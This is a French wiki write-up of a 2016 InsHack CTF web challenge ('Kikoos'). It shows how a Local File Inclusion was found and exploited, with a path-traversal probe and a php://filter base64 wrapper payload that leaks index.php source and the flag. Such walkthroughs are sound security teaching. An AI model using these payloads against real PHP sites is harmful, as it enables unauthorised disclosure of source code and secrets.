Outils pour utilisateurs
ctf:2016:inshack:web100_kikoos
WEB 100 - Kikoos
Le challenge est un site web , qui nous montre des photos de voitures qui se déplacent sur la page web.
Après inspection des sources (html) du site web on remarque :
<title>LFI</title>
On tente de modifier l'url :
http://kikoos.ctf.insecurity-insa.fr/?page=../
La page réagit en nous renvoyant une indication explicant que le paramètre contient des caractères interdit.
La faille est donc une LFI (Local File Inclusion).
Après plusieurs tentatives de guessing d'une page administrateur on tente de récupérer le code source de la page index.php avec un wrapper PHP.
http://kikoos.ctf.insecurity-insa.fr/?page=php://filter/read=convert.base64-encode/resource=index.php
La page nous renvoie le code en base 64 :
PD9waHANCi8vIEZMQUd7TGVha19vZl9GbGFnX2lzX0ltcG9zc2libGU9TEZJfQ0KPz4NCg== ...
On décode le base64 :
FLAG : FLAG{Leak_of_Flag_is_Impossible=LFI}
ctf/2016/inshack/web100_kikoos.txt · Dernière modification: 2016/07/04 08:39 (modification externe)
Outils de la page
Sauf mention contraire, le contenu de ce wiki est placé sous les termes de la licence suivante : CC Attribution-Share Alike 4.0 International
